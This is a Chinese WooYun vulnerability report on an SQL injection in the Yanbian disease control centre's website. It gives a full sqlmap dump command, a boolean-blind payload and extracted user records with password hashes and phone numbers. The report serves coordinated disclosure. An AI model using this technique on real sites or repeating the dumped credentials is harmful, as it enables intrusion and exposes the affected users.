吉林省延边州疾病预防控制中心存在SQL注射漏洞（大量用户密码邮箱电话号码）

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0157801

漏洞标题：吉林省延边州疾病预防控制中心存在SQL注射漏洞（大量用户密码邮箱电话号码）

漏洞作者：路人甲

提交时间：2015-12-03 14:10

修复时间：2016-01-21 11:00

公开时间：2016-01-21 11:00

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：10

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2015-12-03：细节已通知厂商并且等待厂商处理中
2015-12-07：厂商已经确认，细节仅向厂商公开
2015-12-17：细节向核心白帽子及相关领域专家公开
2015-12-27：细节向普通白帽子公开
2016-01-06：细节向实习白帽子公开
2016-01-21：细节向公众公开

简要描述：

吉林省延边州疾病预防控制中心存在SQL注射漏洞（大量用户密码邮箱电话号码）

详细说明：

地址：http://**.**.**.**/main/News/NewsInfo.asp?id=306&ModID=018001

$ python sqlmap.py -u "http://**.**.**.**/main/News/NewsInfo.asp?id=306&ModID=018001" -p id --technique=B --random-agent --batch  --no-cast -T '`user`' -C username,password,email,phone --dump --start 1 --stop 5 --output-dir=output

Database: Microsoft_Access_masterdb
+---------------+---------+
| Table         | Entries |
+---------------+---------+
| `user`        | 104     |

Database: Microsoft_Access_masterdb
Table: user
[5 entries]
+--------+--------+-----------+------------------+-------------------+-----------------+
| modid  | userid | username  | password         | email             | phone           |
+--------+--------+-----------+------------------+-------------------+-----------------+
| 018001 | 7      | dhqxwllzq | 965eb72c92a549dd | dhqxwllzq@**.**.**.** | +86121212121212 |
| 018001 | 8      | dhlzq     | 51cb860b7b9a04cc | dhqxwllzq@**.**.**.** | 6273608         |
| 018001 | 9      | 111111    | 965eb72c92a549dd | 111111@**.**.**.**    | +86111111       |
| 018001 | 90     | dh003     | 49ba59abbe56e057 |                   | 6               |
| 018001 | 91     | dhjd4     | 49ba59abbe56e057 |                   | 8               |
+--------+--------+-----------+------------------+-------------------+-----------------+

漏洞证明：

Database: Microsoft_Access_masterdb
+---------------+---------+
| Table         | Entries |
+---------------+---------+
| `user`        | 104     |
| job           | 82      |
| links         | 12      |
| book          | 10      |
| area          | 9       |
| manager       | 7       |
| product_price | 6       |
| downloads     | 4       |
| email         | 3       |
| department    | 1       |
| index         | 1       |
| sys           | 1       |
| vote          | 1       |
+---------------+---------+
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=306 AND 4657=4657&ModID=018001
---
web server operating system: Windows 2003 or XP
web application technology: Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft Access
Database: Microsoft_Access_masterdb
Table: user
[15 columns]
+-----------+-------------+
| Column    | Type        |
+-----------+-------------+
| key       | non-numeric |
| articleid | numeric     |
| city      | numeric     |
| country   | non-numeric |
| email     | non-numeric |
| homepage  | non-numeric |
| link      | non-numeric |
| logins    | numeric     |
| modid     | numeric     |
| password  | non-numeric |
| phone     | non-numeric |
| question  | non-numeric |
| userid    | numeric     |
| username  | numeric     |
| zip       | numeric     |
+-----------+-------------+
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=306 AND 4657=4657&ModID=018001
---
web server operating system: Windows 2003 or XP
web application technology: Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft Access
Database: Microsoft_Access_masterdb
Table: user
[5 entries]
+--------+--------+-----------+------------------+-------------------+-----------------+
| modid  | userid | username  | password         | email             | phone           |
+--------+--------+-----------+------------------+-------------------+-----------------+
| 018001 | 7      | dhqxwllzq | 965eb72c92a549dd | dhqxwllzq@**.**.**.** | +86121212121212 |
| 018001 | 8      | dhlzq     | 51cb860b7b9a04cc | dhqxwllzq@**.**.**.** | 6273608         |
| 018001 | 9      | 111111    | 965eb72c92a549dd | 111111@**.**.**.**    | +86111111       |
| 018001 | 90     | dh003     | 49ba59abbe56e057 |                   | 6               |
| 018001 | 91     | dhjd4     | 49ba59abbe56e057 |                   | 8               |
+--------+--------+-----------+------------------+-------------------+-----------------+

修复方案：

上WAF。

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

危害等级：高

漏洞Rank：10

确认时间：2015-12-07 10:50

厂商回复：

CNVD确认并复现所述情况,已经转由CNCERT下发给吉林分中心,由其后续协调网站管理单位处置.

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0157801

漏洞标题：吉林省延边州疾病预防控制中心存在SQL注射漏洞（大量用户密码邮箱电话号码）

相关厂商：吉林省延边州疾病预防控制中心

漏洞作者：路人甲

提交时间：2015-12-03 14:10

修复时间：2016-01-21 11:00

公开时间：2016-01-21 11:00

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：10

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0157801

漏洞标题：吉林省延边州疾病预防控制中心存在SQL注射漏洞（大量用户密码邮箱电话号码）

相关厂商：吉林省延边州疾病预防控制中心

漏洞作者： 路人甲

提交时间：2015-12-03 14:10

修复时间：2016-01-21 11:00

公开时间：2016-01-21 11:00

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：10

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2015-0157801"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞概要关注数(24) 关注此漏洞

漏洞作者：路人甲

Tags标签：无

4人收藏收藏
分享漏洞：

版权声明：转载请注明来源路人甲@乌云